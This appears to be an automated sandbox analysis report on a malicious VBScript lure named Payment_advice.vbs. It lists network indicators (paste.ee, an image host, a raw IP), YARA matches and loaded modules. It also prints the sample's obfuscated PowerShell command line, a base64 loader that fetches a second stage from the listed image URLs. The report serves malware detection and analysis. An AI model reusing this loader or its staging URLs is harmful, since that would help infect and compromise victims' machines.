Windows Analysis Report
Payment_advice.vbs

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: paste.ee

Source: global traffic

HTTP traffic detected: GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 45.74.19.84 45.74.19.84
Source: Joe Sandbox View	IP Address: 104.21.84.67 104.21.84.67
Source: Joe Sandbox View	IP Address: 172.67.215.45 172.67.215.45

Source: Joe Sandbox View	ASN Name: HVC-ASUS HVC-ASUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: GET /d/wXm0Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /d/wXm0Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee

Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	TCP traffic detected without corresponding DNS query: 45.74.19.84
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /d/wXm0Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee
Source: global traffic	HTTP traffic detected: GET /images/004/731/958/original/new_image.jpg?1707143673 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /d/wXm0Y HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: paste.ee

Source: unknown

DNS traffic detected: queries for: paste.ee

Source: powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.74.19.84
Source: powershell.exe, 00000004.00000002.2377031114.0000027B47DD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://45.74.19.84/xampp/bkp/new_image_vbs_updated.jpg
Source: wscript.exe, 00000000.00000003.2006264795.000001BA6C6AC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006981587.000001BA6C6A5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2003667146.000001BA6E442000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006070828.000001BA6C3B6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006089620.000001BA6C3A8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006735395.000001BA6C3B6000.00000004.00000020.00020000.00000000.sdmp, Payment_advice.vbs	String found in binary or memory: http://paste.ee/d/wXm0Y
Source: powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2612921842.000001953C342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2379468077.0000027B49B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2612921842.000001953C315000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2612921842.000001953C2F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2379468077.0000027B49B61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://analytics.paste.ee;
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdnjs.cloudflare.com;
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.googleapis.com
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://fonts.gstatic.com;
Source: powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: wscript.exe, 00000000.00000002.2006785424.000001BA6C3E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005766257.000001BA6C3E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/
Source: wscript.exe, 00000000.00000002.2006785424.000001BA6C3E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005766257.000001BA6C3E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/wXm0Y
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C40E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C40C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee/d/wXm0YPh
Source: wscript.exe, 00000000.00000003.2005623172.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://paste.ee:443/d/wXm0Y
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://secure.gravatar.com
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://themes.googleusercontent.com
Source: powershell.exe, 00000004.00000002.2379468077.0000027B49F39000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br
Source: powershell.exe, 00000004.00000002.2377031114.0000027B47DD3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2379468077.0000027B49D83000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com;
Source: wscript.exe, 00000000.00000002.2006839083.000001BA6C41E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2005623172.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2006012459.000001BA6C464000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.5:49712 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 4028, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6556, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Sample has a suspicious name (potential lure to open the executable)

Source: Payment_advice.vbs

Static file information: Suspicious name

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 9144
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 9144			Jump to behavior

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: WinHttpRequest Component version 5.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2087c2f4-2cef-4953-a8ab-66779b670495}

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTrecwBoDgTreHUDgTreZgBmDgTreGwDgTreZQBkDgTreEwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBHDgTreGUDgTredDgTreDgTretDgTreFIDgTreYQBuDgTreGQDgTrebwBtDgTreCDgTreDgTreLQBJDgTreG4DgTrecDgTreB1DgTreHQDgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTrecgBlDgTreHQDgTredQByDgTreG4DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCDgTreDgTrefQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreQDgTreDgTreoDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTrezDgTreDEDgTreLwDgTre5DgTreDUDgTreODgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMDgTreDgTre3DgTreDEDgTreNDgTreDgTrezDgTreDYDgTreNwDgTrezDgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreDgTre6DgTreC8DgTreLwDgTre0DgTreDUDgTreLgDgTre3DgTreDQDgTreLgDgTrexDgTreDkDgTreLgDgTre4DgTreDQDgTreLwB4DgTreGEDgTrebQBwDgTreHDgTreDgTreLwBiDgTreGsDgTrecDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreF8DgTredgBiDgTreHMDgTreXwB1DgTreHDgTreDgTreZDgTreBhDgTreHQDgTreZQBkDgTreC4DgTreagBwDgTreGcDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgT			Jump to behavior

Source: Payment_advice.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
